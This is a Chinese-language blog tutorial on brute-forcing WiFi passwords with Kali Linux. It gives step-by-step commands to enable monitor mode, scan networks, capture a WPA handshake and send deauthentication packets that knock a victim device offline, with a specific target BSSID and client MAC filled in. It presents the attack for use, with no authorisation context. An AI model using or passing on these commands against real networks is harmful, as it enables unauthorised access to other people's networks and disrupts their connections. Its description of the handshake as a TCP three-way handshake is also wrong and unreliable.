KALI - 暴破wifi之抓取握手包

KALI - 暴破wifi之抓取握手包

提示:要有外置的 支持 kali 的 usb 无线网卡,虚拟机要把vmware的usb服务和网卡启用。

1.查看网卡信息

sudo airmon-ng

在这里插入图片描述
或者

sudo ifconfig

在这里插入图片描述

2.开启监听模式

sudo airmon-ng start wlan0

执行成功之后网卡接口变为wlan0mon,可以继续用步骤1的方法查看。

3.扫描wifi

sudo airodump-ng wlan0mon

然后会自动扫描列出附近wifi
记下目标wifi的频道号(CH)和BSSID。
Ctrl+C 停止扫描

4.抓取握手包

该步骤原理:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送包含hash加密的密码数据tcp包,我们的设备伪装成目标wifi窃取该数据包。窃取后即可用字典暴破WiFi密码。(因此目标wifi中至少有一个连接的设备)

开始抓包
sudo airodump-ng -c 6 --bssid 04:95:E6:C3:14:A9 -w ~/ wlan0mon
参数:

-c 指定频道号

--bssid 指定路由器bssid

-w 指定抓取的握手包存储路径
 
 最后是指定网卡接口

可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。

迫使设备重新连接

开始抓包后,我们需要等用户连接我们伪装的wifi,才能抓到包。所以我们需要利用aireplay-ng工具,给连接到wifi的一个设备发送deauth(反认证)包,使该设备断开wifi,随后它自然会再次连接wifi。

sudo aireplay-ng -0 2 -a 04:95:E6:C3:14:A9 -c 38:01:46:8E:E5:20 wlan0mon
参数解释:

-0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)

-a 指定无线路由器BSSID

-c 指定强制断开的设备

 最后是指定网卡接口

出现WPA handshake时,表示抓包成功
在这里插入图片描述

Ctrl+C 停止抓包
最后得到一个后缀为 .cap的握手包文件再拿去暴破

猜你喜欢

转载自blog.csdn.net/weixin_44823747/article/details/107983273
今日推荐